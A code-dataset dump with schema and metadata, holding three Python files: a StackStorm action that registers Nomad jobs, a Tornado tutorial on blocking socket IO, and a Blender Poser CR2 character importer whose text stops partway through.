| Column | Type | Range / Values |
|---|---|---|
| hexsha | string | length 40–40 |
| size | int64 | 2–1.02M |
| ext | string | 10 classes |
| lang | string | 1 class |
| max_stars_repo_path | string | length 4–245 |
| max_stars_repo_name | string | length 6–130 |
| max_stars_repo_head_hexsha | string | length 40–40 |
| max_stars_repo_licenses | list | length 1–10 |
| max_stars_count | int64 (nullable) | 1–191k |
| max_stars_repo_stars_event_min_datetime | string (nullable) | length 24–24 |
| max_stars_repo_stars_event_max_datetime | string (nullable) | length 24–24 |
| max_issues_repo_path | string | length 4–245 |
| max_issues_repo_name | string | length 6–130 |
| max_issues_repo_head_hexsha | string | length 40–40 |
| max_issues_repo_licenses | list | length 1–10 |
| max_issues_count | int64 (nullable) | 1–67k |
| max_issues_repo_issues_event_min_datetime | string (nullable) | length 24–24 |
| max_issues_repo_issues_event_max_datetime | string (nullable) | length 24–24 |
| max_forks_repo_path | string | length 4–245 |
| max_forks_repo_name | string | length 6–130 |
| max_forks_repo_head_hexsha | string | length 40–40 |
| max_forks_repo_licenses | list | length 1–10 |
| max_forks_count | int64 (nullable) | 1–105k |
| max_forks_repo_forks_event_min_datetime | string (nullable) | length 24–24 |
| max_forks_repo_forks_event_max_datetime | string (nullable) | length 24–24 |
| content | string | length 2–1.02M |
| avg_line_length | float64 | 1–417k |
| max_line_length | int64 | 1–987k |
| alphanum_fraction | float64 | 0–1 |
| content_no_comment | string | length 0–1.01M |
| is_comment_constant_removed | bool | 1 class |
| is_sharp_comment_removed | bool | 1 class |
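The rows below follow this schema. As a minimal, hypothetical sketch of how a dump with these columns is typically consumed with the Hugging Face `datasets` library (the dataset ID below is a placeholder, not this dump's real name):

```python
from datasets import load_dataset

# "org/python-code-dump" is a placeholder ID, not this dump's real name.
ds = load_dataset("org/python-code-dump", split="train", streaming=True)

for row in ds:
    # Example filter: keep well-starred files and compare raw vs. comment-stripped size.
    if row["max_stars_count"] and row["max_stars_count"] >= 100:
        print(row["max_stars_repo_name"], row["max_stars_repo_path"],
              len(row["content"]), len(row["content_no_comment"]))
```

Streaming avoids materializing the large `content` columns up front; the nullable `*_count` columns come back as `None`, hence the truthiness check before comparing.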
hexsha: 1c48fbd1f218850d00277e57bd85964c568a70eb | size: 601 | ext: py | lang: Python
max_stars_repo_path: actions/create_job.py | max_stars_repo_name: martezr/stackstorm-nomad | max_stars_repo_head_hexsha: 0659aef2be2e0b8247e32b85f4f37f16181c1068 | max_stars_repo_licenses: ["Apache-2.0"] | max_stars_count: 1 | max_stars_repo_stars_event_min_datetime: 2021-12-26T15:43:51.000Z | max_stars_repo_stars_event_max_datetime: 2021-12-26T15:43:51.000Z
max_issues_repo_path: actions/create_job.py | max_issues_repo_name: martezr/stackstorm-nomad | max_issues_repo_head_hexsha: 0659aef2be2e0b8247e32b85f4f37f16181c1068 | max_issues_repo_licenses: ["Apache-2.0"] | max_issues_count: null | max_issues_repo_issues_event_min_datetime: null | max_issues_repo_issues_event_max_datetime: null
max_forks_repo_path: actions/create_job.py | max_forks_repo_name: martezr/stackstorm-nomad | max_forks_repo_head_hexsha: 0659aef2be2e0b8247e32b85f4f37f16181c1068 | max_forks_repo_licenses: ["Apache-2.0"] | max_forks_count: null | max_forks_repo_forks_event_min_datetime: null | max_forks_repo_forks_event_max_datetime: null
content:
from lib import action
import nomad
class NomadParseJobAction(action.NomadBaseAction):
def run(self, file):
with open(file, "r") as nomad_job_file:
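# ask the Nomad agent to parse the raw HCL job text into a JSON job spec, then register it under a top-level 'Job' key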
output = {}  # initialized before the try so the return below cannot hit an unbound name when parse() fails
try:
job_raw_nomad = nomad_job_file.read()
job_dict = self.nomad.jobs.parse(job_raw_nomad)
output['Job'] = job_dict
self.nomad.jobs.register_job(output)
except nomad.api.exceptions.BadRequestNomadException as err:
print(err.nomad_resp.reason)
print(err.nomad_resp.text)
return output
avg_line_length: 35.352941 | max_line_length: 72 | alphanum_fraction: 0.592346
content_no_comment:
from lib import action
import nomad
class NomadParseJobAction(action.NomadBaseAction):
def run(self, file):
with open(file, "r") as nomad_job_file:
output = {}
try:
job_raw_nomad = nomad_job_file.read()
job_dict = self.nomad.jobs.parse(job_raw_nomad)
output['Job'] = job_dict
self.nomad.jobs.register_job(output)
except nomad.api.exceptions.BadRequestNomadException as err:
print(err.nomad_resp.reason)
print(err.nomad_resp.text)
return output
is_comment_constant_removed: true | is_sharp_comment_removed: true

hexsha: 1c48fd520ee956a849f583d2d50952c3f9107b0f | size: 557 | ext: py | lang: Python
max_stars_repo_path: tornado_overview/chapter01/blockio_test.py | max_stars_repo_name: mtianyan/TornadoForum | max_stars_repo_head_hexsha: 5698dd5cc0e399d3d0ec53e159b8e1f1cddfbe71 | max_stars_repo_licenses: ["Apache-2.0"] | max_stars_count: 2 | max_stars_repo_stars_event_min_datetime: 2019-02-01T00:59:19.000Z | max_stars_repo_stars_event_max_datetime: 2019-02-11T10:50:43.000Z
max_issues_repo_path: tornado_overview/chapter01/blockio_test.py | max_issues_repo_name: mtianyan/TornadoForum | max_issues_repo_head_hexsha: 5698dd5cc0e399d3d0ec53e159b8e1f1cddfbe71 | max_issues_repo_licenses: ["Apache-2.0"] | max_issues_count: null | max_issues_repo_issues_event_min_datetime: null | max_issues_repo_issues_event_max_datetime: null
max_forks_repo_path: tornado_overview/chapter01/blockio_test.py | max_forks_repo_name: mtianyan/TornadoForum | max_forks_repo_head_hexsha: 5698dd5cc0e399d3d0ec53e159b8e1f1cddfbe71 | max_forks_repo_licenses: ["Apache-2.0"] | max_forks_count: 1 | max_forks_repo_forks_event_min_datetime: 2020-10-12T06:15:17.000Z | max_forks_repo_forks_event_max_datetime: 2020-10-12T06:15:17.000Z
content:
# blocking IO
import socket
import requests
html = requests.get("http://www.baidu.com").text
# 1. three-way handshake to establish the TCP connection,
# 2. wait for the server's response
print(html)
print("*" * 30)
# how to fetch the HTML directly over a socket
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
host = "www.baidu.com"
client.connect((host, 80)) # blocking IO: the CPU sits idle while the connection is established
client.send("GET {} HTTP/1.1\r\nHost:{}\r\nConnection:close\r\n\r\n".format("/", host).encode("utf8"))
data = b""
while 1:
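# read until the server closes the connection, at which point recv() returns b''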
d = client.recv(1024) # blocks until data arrives
if d:
data += d
else:
break
data = data.decode("utf8")
print(data)
avg_line_length: 20.62963 | max_line_length: 102 | alphanum_fraction: 0.648115
content_no_comment:
import socket
import requests
html = requests.get("http://www.baidu.com").text
print(html)
print("*" * 30)
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
host = "www.baidu.com"
client.connect((host, 80))
client.send("GET {} HTTP/1.1\r\nHost:{}\r\nConnection:close\r\n\r\n".format("/", host).encode("utf8"))
data = b""
while 1:
d = client.recv(1024)
if d:
data += d
else:
break
data = data.decode("utf8")
print(data)
is_comment_constant_removed: true | is_sharp_comment_removed: true

hexsha: 1c48fe605bf6854476a409dc651aff4fe759c8b0 | size: 46,280 | ext: py | lang: Python
max_stars_repo_path: PCI2.py | max_stars_repo_name: jentron/Blender-PT2 | max_stars_repo_head_hexsha: 30368229992388bb61fab51940a17e2eb114a9fd | max_stars_repo_licenses: ["BSD-2-Clause"] | max_stars_count: 4 | max_stars_repo_stars_event_min_datetime: 2020-07-11T12:30:30.000Z | max_stars_repo_stars_event_max_datetime: 2022-02-11T01:00:35.000Z
max_issues_repo_path: PCI2.py | max_issues_repo_name: jentron/Blender-PT2 | max_issues_repo_head_hexsha: 30368229992388bb61fab51940a17e2eb114a9fd | max_issues_repo_licenses: ["BSD-2-Clause"] | max_issues_count: 43 | max_issues_repo_issues_event_min_datetime: 2020-03-28T19:06:51.000Z | max_issues_repo_issues_event_max_datetime: 2021-10-09T11:51:15.000Z
max_forks_repo_path: PCI2.py | max_forks_repo_name: jentron/Blender-PT2 | max_forks_repo_head_hexsha: 30368229992388bb61fab51940a17e2eb114a9fd | max_forks_repo_licenses: ["BSD-2-Clause"] | max_forks_count: 1 | max_forks_repo_forks_event_min_datetime: 2020-05-16T06:44:57.000Z | max_forks_repo_forks_event_max_datetime: 2020-05-16T06:44:57.000Z
content:
#=============================================================================
# Simplified BSD License, see http://www.opensource.org/licenses/
#-----------------------------------------------------------------------------
# Copyright (c) 2011-2012, HEB Ventures, LLC
# Copyright (c) 2020, 2021, Ronald Jensen
# All rights reserved.
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# * Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#=============================================================================
#########################################################
#
# Character Importer 7/24/2011
#
# Data Structure:
#
# cr2.bones[].xyz (Translation)
# cr2.bones[].angles
# cr2.bones[].smoothPolys
# cr2.bones[].parent
# cr2.bones[].name
# cr2.bones[].endpoint
# cr2.bones[].origin
# cr2.bones[].orientation
# cr2.bones[].
# twist(xyz).child1 (Not sure of order)
# otheractor - (same)
# angles - ABCD
# center - xyz
# sphereMatsRaw
# posBulgeLeft - float
# posBulgeRight - float
# negBulgeLeft - float
# negBulgeRight - float
#
# joint(xyz).child1 (for all children)
# joint(xyz).child1
# taperY(?)
# smoothScaleY(?).child1 (for all children)
# (xyz)OffsetA
# scale
# scale(xyz)
# rotate(xyz)
# (xyz)OffsetB
# translate(xyz) (Some have values)
# cr2.name
#
# cr2.material
# cr2.geometry
#
#########################################################
#
# Goals:
# Load CR2
# Load morphs
# Create Character Tag for Control panel Extras
# Load only Armature / details for use as base for clothing or other props
# Store joint order as property (name) for each bone to use for translation later
#
#
#########################################################
import bpy
import time
import os
import re
# Convenience Imports:
from mathutils import *
from math import *
from bpy_extras import *
from bpy_extras.image_utils import load_image
from bpy.props import StringProperty, BoolProperty, EnumProperty
import sys
local_module_path=os.path.join(os.path.dirname(os.path.abspath(__file__)),'libs')
if local_module_path not in sys.path:
sys.path.append(local_module_path)
import PT2_open as ptl
import RuntimeFolder as Runtime
import GetStringRes
import shaderTrees as st
import shaderTreeParser as stp
import createBlenderMaterialfromP4 as cbm4
from ApplyMorph import ApplyMorph
from ReadPZMD import *
print ('\n')
print ('--- Starting Poser Character Importer Version 3 ---')
bpy.cr2count = 0 # this has a bug, it doesn't persist across saves
###########################################
#
# CR2 Class
#
###########################################
class CR2Class():
def __init__(self):
self.geompath = ''
self.morphBinaryFile = ''
self.name = ''
self.geomData = geomData()
# self.materialData = materialData()
# self.channels = channels()
self.materials = []
self.bones = []
class geomData():
def __init__(self):
self.verts = []
self.UVverts = []
self.faces = []
class materialData():
def __init__(self):
self.color = 55
self.alpha = 75
class boneData():
def __init__(self):
self.xyz = ''
self.name = ''
self.parent = ''
self.endpoint = ''
self.origin = ''
self.orientation = ''
self.angles = ''
class channels():
def __init__(self):
PBM = 'partial body morph'
xoffseta = 0
#xyz = []
# Example Function
def xfactor(xyz):
value=xyz*5
return(value)
###########################################
#
# Import Character Class
#
###########################################
class CharacterImport(bpy.types.Operator):
#time_start = time.time()
bl_idname = "import.poser_cr2"
bl_label = "Load Character"
filename_ext = ".CR2"
filter_glob : StringProperty(default="*.cr2;*.crz", options={'HIDDEN'})
filepath : bpy.props.StringProperty(subtype="FILE_PATH")
overwrite: BoolProperty(
name="Overwrite Materials",
description="Overwrite current materials with the same name",
default=False,
)
externalMorph: BoolProperty(
name="Load External Morphs",
description="Attempt to load external morphs if they are found",
default=True,
)
zUp: BoolProperty(
name="Fix Orientation",
description="Rotate model so Z is up",
default=True,
)
prepare: BoolProperty(
name="Prepare Model",
description="Add armature modifier to the mesh",
default=True,
)
rename: BoolProperty(
name="Rename Bones",
description="Rename bones and groups for Blender convention",
default=True,
)
pnu: EnumProperty(
name="Scale Factor",
description="",
items=(
('PNU_0', "No Scale", "Import model without scaling"),
('PNU_4', "Poser 4 Scale", "1 PNU = 8 feet (or 96 inches/2.43 meters)"),
('GEEP' , "Dr Geep Scale", "1 PNU = 8 feet 4 inches (or 100 inches/2.54 meters)"),
('PNU_6', "Poser 6+ Scale", "1 PNU = 8.6 feet (or 103.2 inches/2.62 meters)"),
),
default='GEEP'
)
def __init__(self):
self.PropArray = []
def getScaleFactor(self):
bnu = bpy.context.scene.unit_settings.scale_length
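# bnu = meters per Blender unit; each branch converts Poser's native unit from inches to meters (x 0.0254), then to Blender units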
if self.pnu == 'GEEP':
scale_factor = 100 * 0.0254 / bnu
elif self.pnu == 'PNU_4':
scale_factor = 96 * 0.0254 / bnu
elif self.pnu == 'PNU_6':
scale_factor = 103.2 * 0.0254 / bnu
else:
scale_factor = 1
return(scale_factor)
def execute(self, context):
cr2 = CR2Class()
print ('\n\n')
print ('===================================================================')
print ('Scale Factor = ', self.getScaleFactor() )
#########################################
#
# Scan for multi obj's first:
# (May not be needed)
#
print ('filepath:', self.filepath)
runtime = Runtime.Runtime(self.filepath)
#runtime.print()
CharName = os.path.basename(self.filepath)[:-4] ## assuming a 3 char extension
print ('CharName:', CharName)
file = ptl.PT2_open(self.filepath, 'rt')
#data = open('/media/disk/armData.txt','w')
morphcounts = []
propcounts = []
for y in file:
x=y.strip()
##############################
#
# Create bone list
#
if x.startswith('actor ') is True:
#print (x)
tempstr = x
tempstr = tempstr.replace('actor ', '')
skipcheck = False
tempstr = ptl.namecheck01(tempstr)
#print ('actor:', tempstr)
if len(cr2.bones) > 0:
for bone in cr2.bones:
#print ('bone.name:', bone.name)
if bone.name == tempstr:
skipcheck = True
#print (skipcheck)
if skipcheck == False:
cr2.bones.append(boneData())
bonecount = len(cr2.bones)
thisbone = cr2.bones[bonecount-1]
tempstr = ptl.namecheck01(tempstr)
thisbone.name = tempstr
elif x.startswith('targetGeom ') is True:
tempstr = x
if morphcounts.__contains__(tempstr) is False:
morphcounts.append(tempstr)
elif x.startswith('prop ') is True:
tempstr = x
if propcounts.__contains__(tempstr) is False:
propcounts.append(tempstr)
##############################
#
# geompath
#
elif x.startswith('figureResFile ') is True:
# print (x)
tempstr = x.replace(r'figureResFile ', '')
cr2.geompath = tempstr.strip('"')
# print ('GeomFile:', cr2.geompath)
elif x.startswith('morphBinaryFile ') is True:
tempstr = x.replace('morphBinaryFile ', '')
cr2.morphBinaryFile = runtime.find_runtime_path( tempstr.strip('"') )
print ('External Morph File:', cr2.morphBinaryFile)
file.close()
print ('Number of Morphs:', len(morphcounts))
print ('Number of Props:', len(propcounts))
#print ('=======')
#for bone in cr2.bones:
# print (bone.name)
#print ('-------------')
print ('=======')
for prop in propcounts:
print (prop)
print ('-------------')
depth = 0 # count of open braces
# blacklist is a list of top-level sections we are not interested in right now
blacklist = ['baseProp', 'controlProp', 'hairGrowthGroup', 'magnetDeformerProp',
'setGeomHandlerOffset', 'sphereZoneProp', 'prop', 'alternateGeom']
current_mat = 'No Mat'
raw_mats = [] # an array of the unparsed materials
mat_name = ''
mats = {}
comps = [] # a list of the material unparsed lines
readcomps = False
mat_depth = 0
morphs = []
morph = Morph()
morphloop = -1
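# morphloop records the brace depth at which a targetGeom block opened; -1 means no morph block is active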
current_morph = ''
mtrx_swap = Matrix((( 1, 0, 0, 0),
( 0, 1, 0, 0),
( 0, 0, 1, 0),
( 0, 0, 0, 1)) )
###############################
#
# Re-open file
#
file = ptl.PT2_open(self.filepath, 'rt')
figureCheck = False
currentActor='' # in Poser an 'actor' is a vertex group or bone
# start of parser loop
for y in file: #file is already an iterable
x = y.strip() # do we .strip() here instead of at every level below?
try:
(keyword, args) = x.split(maxsplit=1)
except ValueError: # the value error should mean there are no args on this line
keyword = x
if keyword in blacklist and depth == 1:
while True: # iterate through the file until the section ends
x=next(file).strip()
if x.startswith('{'):
depth += 1
elif x.startswith('}'):
depth -= 1
if depth < 2:
break
elif keyword == 'actor':
currentActor = ptl.namecheck01(args)
for bone in cr2.bones:
if bone.name == currentActor:
currentbone = bone
outstr = str(currentbone.name) + ':'
#data.write(outstr)
###############################################
elif keyword == 'angles':
currentbone.angles = args
elif keyword == 'origin':
currentbone.origin = args
elif keyword == 'endPoint':
currentbone.endpoint = args
# there are parent, inkyParent, and nonInkyParent.
# I have seen all three on the same bone, or just inky and nonInky or just parent
elif keyword == 'parent' or keyword == 'nonInkyParent':
currentbone.parent = ptl.namecheck01(args)
elif keyword == 'orientation':
currentbone.orientation = args
elif x.startswith('twistX twistx'):
tempstr = x.replace(' ', '_')
currentbone.xyz = currentbone.xyz + tempstr + ' '
#print ('currentbone:', currentbone.name)
#print ('adding:', tempstr)
elif x.startswith('twistY twisty'):
tempstr = x
#print ('currentbone:', currentbone.name)
#print ('adding:', tempstr)
tempstr = tempstr.replace(' ', '_')
currentbone.xyz = currentbone.xyz + tempstr + ' '
elif x.startswith('twistZ twistz'):
tempstr = x
#print ('currentbone:', currentbone.name)
#print ('adding:', tempstr)
tempstr = tempstr.replace(' ', '_')
currentbone.xyz = currentbone.xyz + tempstr + ' '
elif x.startswith('jointX jointx'):
tempstr = x
#print ('currentbone:', currentbone.name)
#print ('adding:', tempstr)
tempstr = tempstr.replace(' ', '_')
currentbone.xyz = currentbone.xyz + tempstr + ' '
elif x.startswith('jointY jointy'):
tempstr = x
#print ('currentbone:', currentbone.name)
#print ('adding:', tempstr)
tempstr = tempstr.replace(' ', '_')
currentbone.xyz = currentbone.xyz + tempstr + ' '
elif x.startswith('jointZ jointz'):
tempstr = x
#print ('currentbone:', currentbone.name)
#print ('adding:', tempstr)
tempstr = tempstr.replace(' ', '_')
currentbone.xyz = currentbone.xyz + tempstr + ' '
elif keyword == 'figure' and figureCheck == False:
figureCheck = True
#print ('========= Figure check True !! ===============')
elif keyword == 'name' and figureCheck == True:
if not args.startswith('Figure'):
CharName = args
figureCheck = False
##########################################################
# Morph Targets.
#
elif keyword == 'targetGeom':
morph.name = args
morphloop = depth
morph.group = currentActor
elif keyword == 'k' and depth >= morphloop:
morph.value = float(x.split()[2])
elif keyword == 'min' and depth >= morphloop:
morph.min = float(x.split()[1])
elif keyword == 'max' and depth >= morphloop:
morph.max = float(x.split()[1])
elif keyword == 'trackingScale' and depth >= morphloop:
morph.trackingScale = float(x.split()[1])
elif keyword == 'd' and depth >= morphloop:
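# a 'd' line is a single morph delta: a vertex index followed by its x/y/z offset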
i, dx, dy, dz = [float(s) for s in args.split()]
morph.deltas.append( { int(i) : Vector( (dx, dy, dz) ) } )
elif keyword == 'indexes' and depth >= morphloop:
morph.indexes = float(args)
elif keyword == 'numbDeltas' and depth >= morphloop:
morph.numbDeltas = float(args)
elif keyword == '{':
depth += 1
# print('Depth++: ', depth, morphloop, matloop)
elif keyword == '}':
depth -= 1
if morphloop >= depth:
# morph.print()
morphloop = -1
morphs.append(morph)
morph = Morph()
# print('Depth--: ', depth, morphloop, matloop)
##########################################################
# Build material array
#
elif keyword == 'material':
#print ('Mat:', line.replace('material', ''))
readcomps = True # Turn on component reader
mat_name = args
print ('Mat Name:', mat_name)
while readcomps:
line = next(file).strip()
if line.startswith('{') is True and readcomps is True:
mat_depth += 1
elif line.startswith('}') is True and mat_depth > 0:
mat_depth -= 1
comps.append([mat_depth, line.split()])
# print(mat_depth, line)
if mat_depth == 0 and readcomps is True:
readcomps=False
raw_mats.append([mat_name, comps])
mat_name = ''
comps = []
# end of parser loop
#data.close()
file.close()
bpy.cr2count = bpy.cr2count + 1
###########################################
#
# Create Armature
#
###########################################
# CharName not working, reset to default:
#CharName = 'Body'
cr2.name = CharName + str(bpy.cr2count)
print ('\nCharacter:', cr2.name)
print ('=======================================')
print (bpy.context.mode)
if bpy.context.mode != 'OBJECT':
# bpy.ops.object.editmode_toggle()
bpy.ops.object.mode_set(mode='OBJECT')
print ("Creating Armature 3")
arm = bpy.data.armatures.new(cr2.name)
object_utils.object_data_add(context, arm, operator=None)
bpy.context.view_layer.update()
arm = bpy.context.active_object
arm.location.x = 0
arm.location.y = 0
arm.location.z = 0
arm.data.display_type = 'STICK'
arm.show_in_front = True
print (arm)
arm.name = cr2.name
armdata = arm.data
armdata.name = "Arm_data_"+cr2.name
if bpy.context.mode != 'EDIT_MODE':
bpy.ops.object.mode_set(mode='EDIT')
#print ('Object Name:', arm.name)
#print ('Armature Name:', armdata.name)
bones = armdata.edit_bones
for bone in cr2.bones:
#print (bone.name)
# if bone.name.startswith('BODY'):
# pass
if bone.origin == '':
pass
elif bone.name.startswith('bodyMorphs'):
pass
else:
ebone = bones.new(bone.name)
ebone.head = [float(s) for s in bone.origin.split()]
#array = [float(s) for s in string.split()]
ebone.tail = [float(s) for s in bone.endpoint.split()]
#ebone.parent = bone.parent
ebone.head_radius = 0.02
ebone.tail_radius = 0.02
ebone.envelope_distance = 0.05
pass
#####################################
#
# Add xyz joint order property here:
#
#####################################
xyzprop = bone.xyz.split()
xyz = ''
if len(xyzprop) > 2:
if xyzprop[0].__contains__('X'):
xyzprop[0] = 'X'
if xyzprop[1].__contains__('X'):
xyzprop[1] = 'X'
if xyzprop[2].__contains__('X'):
xyzprop[2] = 'X'
if xyzprop[0].__contains__('Y'):
xyzprop[0] = 'Y'
if xyzprop[1].__contains__('Y'):
xyzprop[1] = 'Y'
if xyzprop[2].__contains__('Y'):
xyzprop[2] = 'Y'
if xyzprop[0].__contains__('Z'):
xyzprop[0] = 'Z'
if xyzprop[1].__contains__('Z'):
xyzprop[1] = 'Z'
if xyzprop[2].__contains__('Z'):
xyzprop[2] = 'Z'
xyz = xyzprop[0] + xyzprop[1] + xyzprop[2]
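# the three channel tokens collapse to bare axis letters (e.g. 'YZX'), giving the Poser joint order stored on the bone below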
bone = ebone
#print (bone)
bone["joint order"] = xyz
#####################################
#
# Set Bone Roll:
# Negate the Z-axis
#
#####################################
try:
#print ('joint order:', str(xyz)[1])
bonerollaxis = bone["joint order"][1]
flip = False
if bonerollaxis == 'Z':
flip = True
ebone.select = True
#bpy.ops.armature.calculate_roll(type=bonerollaxis, axis_flip=flip)
bpy.ops.armature.calculate_roll(type=bonerollaxis)
#print ('rolling bone to:', bonerollaxis)
ebone.select = False
except:
pass
###########################################
#
# Set bone parents
#
###########################################
print ('\n------- parenting bones ------------')
for bone in cr2.bones:
try:
#print (bone.name)
child = bones.get(bone.name)
parent = bones.get(bone.parent)
child.parent = parent
except:
pass
###########################################
#
# Copy Joint Order to pose bones
#
###########################################
bpy.ops.object.mode_set(mode='EDIT')
arm = bpy.context.active_object
bones = arm.data.edit_bones
temp = []
xyza = []
for bone in bones:
temp = [bone.name, bone["joint order"]]
xyza.append(temp)
temp = []
bpy.ops.object.mode_set(mode='POSE')
pbones = arm.pose.bones
for value in xyza:
if value[1] != '':
pbones[value[0]]["joint order"] = value[1]
for bone in pbones:
bone["bend"] = 1
bone["side"] = 1
bone["twist"] = 1
###########################################
#
# Read Geometry
#
###########################################
print ('\n\n')
print ('==================================================================')
print ('=')
print ('= Creating Mesh ')
print ('=')
print ('==================================================================')
###########################################
#
# Get Geom file path
#
###########################################
char = bpy.context.active_object
char['GeomPath'] = cr2.geompath
print (self.filepath)
print ('geompath:', cr2.geompath)
fullgeompath=runtime.find_runtime_path(cr2.geompath)
print(fullgeompath)
###########################################
#
# Open File
#
###########################################
# Or internal Mesh?
vertcount = 0
facecount = 0
facearray = []
UVvertices = []
verts = []
current_group = ''
file3 = ptl.PT2_open(fullgeompath, 'rt')
#print ('Pre-655 check')
#linecount = 1
for temp in file3:
#print ('line:', linecount, 'temp:', temp)
#linecount += 1
temparray2 = []
###########################################
#
# Create Vert List
#
###########################################
if temp.startswith('v '):
vert = temp.split()
vert.remove('v')
vert = [float(i) for i in vert]
vert = tuple(vert)
cr2.geomData.verts.append(vert)
###########################################
#
# Create Face List w/ Mats
# And vert group
#
###########################################
elif temp.startswith('old_f '):
face = temp.split()
face.remove('f')
tempface = []
for vert in face:
vert2 = vert.split('/')
#print (vert2)
tempface.append(int(vert2[0])-1)
if len(tempface) > 4:
print ('Fgon Warning!!')
print (tempface)
else:
cr2.geomData.faces.append(tempface)
elif temp.startswith('f ') is True:
tempstr1 = current_mat
tempstr2 = temp.lstrip('f ')
tempstr3 = current_group
facearray.append([tempstr1, tempstr2, tempstr3])
#print (tempstr1, tempstr2, tempstr3)
###########################################
#
# Create UV Vert list
#
###########################################
elif temp.startswith('old_vt '):
uvvert = temp.split()
uvvert.remove('vt')
uvvert = [float(i) for i in uvvert]
cr2.geomData.UVverts.append(uvvert)
elif temp.startswith('vt ') is True:
tempstr = temp.lstrip('vt ')
#print (tempstr)
temparray1 = [float(s) for s in tempstr.split()]
temparray2.append(temparray1[0])
temparray2.append(temparray1[1])
UVvertices.append(temparray2)
#print ('UVvertices:', temparray2)
elif temp.startswith('usemtl ') is True:
current_mat = temp.split()[1]
elif temp.startswith('g ') is True:
try:
tempstr = temp.split()[1]
except IndexError:
tempstr = 'Null' # there is no group name
current_group = tempstr
#print ('Current group:', current_group)
###########################################
#
# Create Mesh
#
###########################################
print (facearray[1])
mesh = bpy.data.meshes.new(cr2.name+':Mesh')
#mesh = bpy.data.meshes.new()
ob = bpy.data.objects.new(cr2.name+':Object', mesh)
ob.data['morphFile']=cr2.morphBinaryFile
#ob = bpy.data.objects.new('Body', mesh)
scn = bpy.context.scene #C = bpy.context, D = bpy.data
# scn.objects.link(ob) D.collections['Collection 1'].objects.link(D.objects['MeshObject'])
# scn.objects.active = ob
# scn.update()
bpy.context.view_layer.active_layer_collection.collection.objects.link(ob)
mesh.from_pydata(cr2.geomData.verts, [], cr2.geomData.faces)
mesh.update(calc_edges=True)
facecount = 0
extrafaces = []
extrafacecount = 1
print ('-----------------------------------')
textureverts = []
faces = []
face_mat = []
textureverts = []
#
# Vert group data file
#
#
#vertfile = open('k:\\vertgroup.txt', 'w')
for face in facearray:
TempTextureVerts = []
temparray = []
facemat = face[0] #mat this face is assigned to
vertlist = face[1] # list of all verts in face: 30/1/4 32/2/9
eachvert = vertlist.split() # equals ['30/1/4', '32/2/9', ...]
#print ('eachvert:', eachvert)
geomface = []
for y in eachvert:
splitverts = y.split('/') # equals ['30', '1', '4']
geomface.append(splitverts[0]) # adds first vert index to geom face vert list
if len(splitverts) > 1:
TempTextureVerts.append(splitverts[1])
# I have encountered files in the wild with some unmapped faces
# so set them to zero so the indexes match
else:
TempTextureVerts.append(0)
for vert in geomface:
temparray.append(int(vert)-1)
##########################################################################
#
# Must deal with face and UV face together to match up texture map
#
if len(temparray) < 5:
faces.append(temparray) # list of vert indices [1,2,3,4]
temp_mat_array = [facecount, facemat] # face index, mat name
face_mat.append(temp_mat_array) # add face# and mat name to list
textureverts.append(TempTextureVerts)# add texture verts to list
facecount = facecount + 1
else:
y = len(temparray)
faces.append([temparray[0], temparray[1], temparray[2]])# adds the first face
if len(TempTextureVerts) > 0:
textureverts.append([TempTextureVerts[0], TempTextureVerts[1], TempTextureVerts[2]]) # Add matching UV face
temp_mat_array = [facecount, facemat] # face index, mat name
face_mat.append(temp_mat_array) # add face# and mat name to list
facecount = facecount + 1
for q in range(2,y-1):
# Creates triangles out of remaining vertex list
faces.append([temparray[0], temparray[q], temparray[q+1]])
if len(TempTextureVerts) > 0:
textureverts.append([TempTextureVerts[0], TempTextureVerts[q], TempTextureVerts[q+1]]) # Add matching UV face
temp_mat_array = [facecount, facemat] # face index, mat name
face_mat.append(temp_mat_array) # add face# and mat name to list
facecount = facecount + 1
###########################################
#
# Create Vert Groups
#
###########################################
# face = (Mat, vertlist, group name)
# ob = object
#print (ob.vertex_groups)
#################################
#
# Create VGroup if not already
#
#################################
#ob = bpy.context.object
vg = ob.vertex_groups
#groupname = 'lEye'
groupname = face[2]
g_exists = False
if len(vg) > 0:
for g in vg:
#print (g.name)
if g.name == groupname:
g_exists = True
if g_exists == True:
pass
else:
vg.new(name=groupname)
#################################
#
# Add Vert to Group
# vg.add(index, weight, type)
#
#################################
for y in eachvert:
splitverts = y.split('/') # equals ['30', '1', '4']
#geomface.append(splitverts[0]) # adds first vert index to geom face vert list
#print (vg[0])
'''
for vert in splitverts:
if groupname == 'lHindToes' and int(vert) < 100:
print ('Group:', groupname, ' vert:', vert)
vg[groupname].add([int(vert)], 1, 'ADD')
outstr = groupname + ' ' + str(vert) + '\n'
vertfile.write(outstr)
'''
vg[groupname].add([int(splitverts[0])-1], 1, 'ADD')
#outstr = groupname + ' ' + str(int(splitverts[0])-1) + '\n'
#vertfile.write(outstr)
#vg.add(vertnum, 1, 'ADD')
mesh.from_pydata(verts, [], faces)
mesh.update()
#vertfile.close()
###########################################
#
# Create UV Map
#
###########################################
facecount = 0
longfaces = []
if( len(UVvertices) > 0 ):
#mesh.uv_textures.new()
uvlayer = mesh.uv_layers.new()
if uvlayer:
mesh.uv_layers.active = uvlayer
facecount = 0
longfaces = []
#print ('Len of textureverts:', len(textureverts))
